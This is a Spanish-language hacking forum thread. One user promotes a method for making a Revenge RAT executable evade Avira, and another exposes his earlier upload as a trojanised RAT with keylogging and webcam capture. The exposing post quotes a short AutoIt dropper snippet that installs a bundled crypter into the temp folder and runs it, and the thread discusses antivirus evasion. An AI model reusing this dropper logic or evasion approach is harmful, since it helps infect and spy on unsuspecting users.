Página 1 de 1

Fud ejecutable Revenge Rat..

Publicado: 05 Ago 2019, 07:41
por die595tack068
Solo quiero compartir el link de mi canal que acabe de crear y que miren el metodo nuevo de indeteccion y runtime con avira, ya que es uno de los avs mas dificiles de evadir..
De paso soy el user die595tack067 fui baneado por algo que subi mientras hacia laboratorios, pido disculpas por eso, sin embargo tenia este otro usuario, no voy a subir mas herramientas pero pues voy a compartir el.metodo espero sea de su agrado, solo quiero tratar de revivir el foro, y no estar al pendiente de lo que suben los usuarios y estarlo escaneando en [Enlace externo eliminado para invitados]
Como la hace un user por ahi que no quiero decir quien es ;)

Link:   [Enlace externo eliminado para invitados]

Re: Fud ejecutable Revenge Rat..

Publicado: 07 Ago 2019, 03:58
por Scorpio
¡¿Mientras hacías laboratorios?! ¡¿SOBRE COMO INFECTAR A USUARIOS DEL FORO?! Lo que subiste fue un RAT que te hiciste, con todo... Keylogger, Screen Grabber, Webcam Grabber, Download & Execute, Delete Cookies... pensando que los usuarios del foro son tontos, pero somos mas listos que tu pichón.

La evidencia mas clara es ésta:

Código: Seleccionar todo

IF @SCRIPTNAME <> "LFQWMW.exe" AND @SCRIPTNAME <> "svwin2.exe" AND @SCRIPTNAME <> "svwin1.exe" THEN
    FILEINSTALL("C:\Users\toshiba\Desktop\vSupreme Crypter v0.2\vSupreme Crypter v0.2.exe", @TEMPDIR & "/RNOATS.exe")
    SHELLEXECUTE(@TEMPDIR & "/RNOATS.exe")
ENDIF
Aquí se ve claramente como uniste el Crypter puerco ese (Del cual también extraiste el Icono para usarlo al Compilar el RAT), para luego dropearlo, ejecutarlo y tratar de camuflar así el RAT.

Este es el Código Completo (El cual aún tiene 3 binarios más, uno de ellos al menos, es un Reverse Proxy en .DLL (¿Igual este era el verdadero aporte para el foro?):
[Enlace externo eliminado para invitados]

PD: Por lo que veo llevas al menos 9 meses usando el juguete y ya estás de sobra trackeado.

//Regards.

Re: Fud ejecutable Revenge Rat..

Publicado: 24 Ago 2020, 04:36
por Roda
te sacaron la careta die595tack068